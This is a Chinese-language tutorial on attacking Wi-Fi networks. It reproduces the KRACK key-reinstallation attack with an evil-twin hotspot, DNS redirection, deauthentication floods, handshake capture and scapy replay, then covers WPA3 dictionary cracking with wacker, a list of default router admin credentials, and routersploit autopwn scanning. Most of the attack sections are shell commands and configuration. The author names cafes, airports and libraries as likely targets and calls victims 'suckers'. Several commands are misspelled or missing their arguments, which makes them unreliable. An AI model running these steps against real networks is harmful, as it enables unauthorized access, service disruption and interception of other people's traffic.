0x00 進(jìn)行滲透時(shí)需知曉的基礎(chǔ)知識(shí)

1.WPA2:是WPA的升級(jí)版，是針對(duì)保護(hù)無(wú)線(xiàn)網(wǎng)絡(luò)安全而設(shè)計(jì)的無(wú)線(xiàn)網(wǎng)絡(luò)保護(hù)系統(tǒng)，引入了PSK（預(yù)共享密鑰模式）秘鑰，加強(qiáng)了WPA的不足之處，但是因?yàn)槭褂昧薖SK，所以只要攻擊者知曉目標(biāo)的PSK秘鑰，就能十分輕易加入無(wú)線(xiàn)網(wǎng)絡(luò)。

2.WPA3:是近幾年新出現(xiàn)的無(wú)線(xiàn)網(wǎng)絡(luò)安全保護(hù)系統(tǒng)，在WPA2的基礎(chǔ)上實(shí)現(xiàn)了針對(duì)字典法暴力密碼破解的難度，如果失敗次數(shù)過(guò)多，AP將直接鎖定攻擊行為，以及取代了PSK使用對(duì)等實(shí)體驗(yàn)證（SAE）

3.AP:特指無(wú)線(xiàn)網(wǎng)絡(luò)接入點(diǎn)，就是路由器等設(shè)備的廣泛稱(chēng)呼

PS.實(shí)現(xiàn)無(wú)線(xiàn)網(wǎng)絡(luò)攻擊一般都需要兩張或更多網(wǎng)卡，有時(shí)候也需要一些社工手段！購(gòu)買(mǎi)無(wú)線(xiàn)網(wǎng)卡強(qiáng)烈建議購(gòu)買(mǎi)支持802.11ac協(xié)議的網(wǎng)卡?。?！

0x01 WPA2滲透思路

如果實(shí)在嫌跑密碼的進(jìn)度過(guò)慢或者沒(méi)有好的字典，可以試一試wpa2的秘鑰重裝攻擊(KRACK)

PS.本文所用的方法絕大部分沒(méi)有使用大佬提供的POC,旨為了能夠完全細(xì)化并理解KRACK攻擊的步驟

0x02 秘鑰重裝攻擊復(fù)現(xiàn)步驟：

秘鑰重裝攻擊（KRACK）：
此攻擊針對(duì)WPA2協(xié)議中創(chuàng)建一個(gè)Nonce（一種共享密鑰）的四次握手。

0x03 KRACK的原理：

WPA2的標(biāo)準(zhǔn)預(yù)期有偶爾發(fā)生的Wi-Fi斷開(kāi)連接，并允許使用同樣的值重連第三次握手，以做到快速重連和連續(xù)性。因?yàn)闃?biāo)準(zhǔn)不要求在此種重連時(shí)使用不同密鑰，所以可能出現(xiàn)重放攻擊。

攻擊者還可以反復(fù)重發(fā)另一設(shè)備的第三次握手來(lái)重復(fù)操縱或重置WPA2的加密密鑰。每次重置都會(huì)使用相同的值來(lái)加密數(shù)據(jù)，因此可以看到和匹配有相同數(shù)據(jù)的塊，識(shí)別出被加密密鑰鏈的數(shù)據(jù)塊。隨著反復(fù)的重置暴露越來(lái)越多的密鑰鏈，最終整個(gè)密鑰鏈將被獲知，攻擊者將可讀取目標(biāo)在此連接上的所有流量。

WPA2通常用于移動(dòng)設(shè)備至固定接入點(diǎn)或家庭路由器的連接，盡管某些流量本身可能被SSL/TLS等協(xié)議加密，但風(fēng)險(xiǎn)仍十分嚴(yán)重。（資料來(lái)自百度百科）

1.啟動(dòng)網(wǎng)卡的混雜模式

sudo airmong-ng start

2.對(duì)目標(biāo)AP進(jìn)行信息收集
先用

sudo airodump-ng

3.找到目標(biāo)AP的BSSID

這是我家中的2.4g無(wú)線(xiàn)網(wǎng)絡(luò)，第一個(gè)使用橋接模式橋接了CMCC,因?yàn)閮蓚€(gè)路由器都已經(jīng)安裝了最新的固件把秘鑰重裝漏洞修復(fù)了，所以該次實(shí)驗(yàn)不會(huì)對(duì)我的路由器與設(shè)備造成損傷或是成功滲透，但是針對(duì)現(xiàn)實(shí)中像是咖啡店、機(jī)場(chǎng)、圖書(shū)館類(lèi)的場(chǎng)景，路由器的固件很有可能并沒(méi)有升級(jí)到最新版本，所以該攻擊可能依然有效

4.鎖定目標(biāo)BSSID后，使用

sudo airodump-ng --bssid=

5.嗅探該AP中的所有成員

如果沒(méi)有成員的話(huà)可以插拔一下網(wǎng)卡（我才不會(huì)因?yàn)樵趶?fù)現(xiàn)過(guò)程中沒(méi)看到網(wǎng)卡關(guān)閉等了十幾分鐘這件事說(shuō)出來(lái)）

6.克隆Wi-Fi釣魚(yú)熱點(diǎn)
需要偽造一個(gè)同名，同mac地址的釣魚(yú)熱點(diǎn)
更改網(wǎng)卡mac地址步驟：

sudo ifconfig device2 down
sudo macchaner device2 -m  //注意，請(qǐng)將這里的newmac更改為目標(biāo)AP點(diǎn)的mac地址
sudo ifconfig device2 up

偽造熱點(diǎn)：

sudo airmong start wlan2 //開(kāi)啟網(wǎng)卡的監(jiān)聽(tīng)模式
sudo airbase-ng -e   -c   //講trget SSID更改為目標(biāo)SSID，并且channel更改成不同的信道
sudo ifconfig at0 up //啟動(dòng)虛擬網(wǎng)關(guān)
sudo vi /etc/network/interfaces
------------------------------
//配置虛擬網(wǎng)卡地址參數(shù)
auto at0
iface at0 inet static
address 192.168.199.1  //這里最好與目標(biāo)ap點(diǎn)的管理頁(yè)面一樣
netmask 255.255.255.0
------------------------------
sudo service networking restart //重啟網(wǎng)卡服務(wù)
ifconfig at0查看at0網(wǎng)卡，如果沒(méi)有ip地址或者不存在，重試以上步驟,注意！必須先使用airbase-ng創(chuàng)建AP點(diǎn),at0網(wǎng)卡才會(huì)被可用！

配置DHCP:

sudo vi /etc/dhcp/dhcpd.conf
設(shè)置子網(wǎng) 掩碼 分配地址范圍等
在里面添加：
subnet 192.168.199.0 netmask 255.255.255.0{
    range 192.168.199.100 192.168.199.150;
    option routers 192.168.199.1;
    option subnet-mask 255.255.255.0;
    option domain-name-servers 192.168.178.99; //注意這里的doamin地址需要自己更換
}

進(jìn)入下一配置文件，將at0指定為dhcp請(qǐng)求網(wǎng)卡

sudo vi /etc/default/isc-dhcp-server
將其中的INTERFACESv4=""更改為INTERFACESv4="at0"

sudo service isc-dhcp-server restart //重啟dhcp服務(wù)

配置dnsmasq

sudo vi /etc/dnsmasq.conf
添加以下內(nèi)容:
resolv-file=/etc/resolv.conf //設(shè)置resolv目錄
strict-order
listen-address=192.168.199.113 //這個(gè)ip是本機(jī)ip，如果只想本地訪(fǎng)問(wèn)可以填寫(xiě)127.0.0.1

address=/baidu.com/192.168.178.99 //注意，這一步很重要，需要在這里設(shè)置泛解析
address=/111.com/220.181.38.148

server=8.8.8.8 
//設(shè)置谷歌dns為首選dns
server=114.114.114.114

sudo vi /etc/resolv.conf
添加nameserver為本機(jī)ip地址

重啟dnsmasq服務(wù)

sudo service dnsmasq restart

設(shè)置iptables進(jìn)行流量轉(zhuǎn)發(fā):

//使用iptables編寫(xiě)規(guī)則：

iptables -t nat -A POSTROUTING -s 192.168.199.0/24 -j SNAT --to 192.168.178.99

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
//對(duì)eth0進(jìn)行源nat
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT
//轉(zhuǎn)發(fā)能上網(wǎng)的無(wú)線(xiàn)網(wǎng)卡流量
iptables -A FORWARD -p tcp --syn -s 192.168.199.0/24 -j TCPMSS --set-mss 1356
iptables-save //保存

克隆Wi-Fi后成功獲取到成員進(jìn)入網(wǎng)絡(luò)提示信息

7.但是我們也不能白等新的冤大頭連上我們的熱點(diǎn)，所以我們可以對(duì)目標(biāo)AP的成員使用斷網(wǎng)攻擊使其強(qiáng)制掉線(xiàn)重連
aireplay-ng攻擊：

//先對(duì)目標(biāo)AP進(jìn)行鎖定監(jiān)聽(tīng)并保存抓到的握手包
sudo airodump-ng  --bssid= --channel= -w <文件保存路徑>
//然后打開(kāi)一個(gè)新的命令窗口進(jìn)行攻擊
sudo aireplay-ng -0 0 -a   -c  

mdk3/mdk4攻擊：

vi blacklist //創(chuàng)建一個(gè)黑名單文件，并且把目標(biāo)的BSSID填進(jìn)去
sudo mdk3  d -s 1000 -b blacklist.txt -c  //執(zhí)行攻擊
//mdk4同理,只需要把mdk3換成mdk4

稍等一會(huì)后，所有目標(biāo)均已離線(xiàn)，2.4gAP網(wǎng)絡(luò)用戶(hù)斷網(wǎng)連接后一般來(lái)說(shuō)都可以直接獲取到握手包

8.獲取四次握手的數(shù)據(jù)包
當(dāng)左上角出現(xiàn)：

就說(shuō)明我們拿到了握手包
接著打開(kāi)wireshak,將上一步的01號(hào)數(shù)據(jù)包到wireshark打開(kāi)搜索字符串Message
需要找到

然后右鍵選擇標(biāo)記分組

之后選擇左上角"文件"->導(dǎo)出特定分組->選擇僅選中分組

保存第三條握手包
7.實(shí)行攻擊
（因?yàn)槲疫@硬件條件實(shí)在不允許，就說(shuō)一下實(shí)行攻擊 的具體步驟，并且貼出大佬的POC吧）
(1)使用scapy偽造含有CSA(信道切換公告)信標(biāo)的beacon管理幀，使成員強(qiáng)制連接到釣魚(yú)熱點(diǎn)
CSA信息元素：

(2)向成員設(shè)備發(fā)送3號(hào)握手包多次，并允許1、2號(hào)握手包通過(guò)，阻斷4號(hào)握手包使其強(qiáng)制安裝秘鑰

在此演示使用scapy發(fā)送三號(hào)握手包
sudo scapy //打開(kāi)scapy

在wireshark中我們可以看到Message 3 of 4被成功重傳

攻擊完成，攻擊者打開(kāi)wireshark監(jiān)聽(tīng)，可以發(fā)現(xiàn)成員在目標(biāo)AP內(nèi)瀏覽的所有TCP明文

WPA3攻擊思路

因?yàn)镈ragonblood漏洞組并沒(méi)有公布相關(guān)的攻擊方式與POC，所以這一節(jié)我們來(lái)了解一下我在github上找的一個(gè)WPA3在線(xiàn)字典攻擊工具----wacker
在使用工具前，我們需要先編譯作者自改的wpa_supplicant
首先下載工具
git clone https://github.com/blunderbuss-wctf/wacker.git
cd wacker

apt-get install -y pkg-config libnl-3-dev gcc libssl-dev libnl-genl-3-dev
cd wpa_supplicant-2.8/wpa_supplicant/
cp defconfig_brute_force .config
make -j4
ls -al wpa_supplicant
//執(zhí)行玩上述步驟以構(gòu)建wpa_supplicant后，我們就可以正常使用工具了

split.sh是用來(lái)為多個(gè)網(wǎng)卡進(jìn)行分配破解工作而進(jìn)行生成單次列表
使用：sudo ./split.sh <份數(shù)> <單詞列表>

wacker.py是程序本體
使用方法與選項(xiàng)：

--wordlist  指定使用的字典
--interface  指定使用的設(shè)備
--bssid  指定目標(biāo)的BSSID
--ssid  WPA3的ssid
--freq  AP的頻率
--start  從單詞列表中的指定字符開(kāi)始
--debug 輸出debug信息
--wpa2 使用WPA2模式

使用例：

社會(huì)工程學(xué)/密碼泄露手段

俗話(huà)說(shuō)得好，當(dāng)你不知道的時(shí)候建議直接去問(wèn)，這也同樣適用直接詢(xún)問(wèn)Wi-Fi密碼
還有一種手段那就是直接使用Wi-Fi萬(wàn)能鑰匙等這種密碼泄漏工具，使用手機(jī)自帶的生成Wi-Fi二維碼功能，再配合掃碼就能直接得到密碼。

路由器后臺(tái)滲透思路

在進(jìn)入無(wú)線(xiàn)局域網(wǎng)后，我們可以對(duì)無(wú)線(xiàn)路由器的后臺(tái)進(jìn)行滲透，滲透后臺(tái)的方法包括但不限于：漏洞、跑包、弱密碼，后臺(tái)密碼很大概率會(huì)與Wi-Fi密碼相同
這里貼出一些常用路由器的默認(rèn)后臺(tái)賬號(hào)密碼：

TP_LINK家用路由器:admin-admin
TP_LINK企業(yè)級(jí)路由器:admin-admin123456或admin-123456admin
Tenda路由器：admin-admin
360路由器:admin-admin
華為路由器:admin-admin
Netcore路由器:guest-guest
小米：沒(méi)密碼
FAST路由器:admin-admin
D-Link路由器:admin-admin
PHICOMM路由器:admin-admin
漏洞滲透思路：

談到對(duì)路由器的漏洞攻擊手段，不得不提到大名鼎鼎的routersploit
routersploit項(xiàng)目地址//github.com/threat9/routersploit.git
routersploit的安裝(kali下):

git clone https://github.com/threat9/routersploit.git
cd routersploit
pip3 install -r requirements.txt

routersploit的使用:

sudo ./rsf.py //開(kāi)啟routersplot
use scanners/autopwn //執(zhí)行自動(dòng)掃描模塊
show option //查看設(shè)置

set target <路由器后臺(tái)地址>
run //啟動(dòng)掃描

耐心等待掃描結(jié)束，如果該漏洞對(duì)路由器有效的話(huà)，會(huì)直接列出來(lái)，如果可能對(duì)該路由器有用會(huì)列出可能有效的漏洞

作者：Tug0u_Fenr1r

編輯：黃飛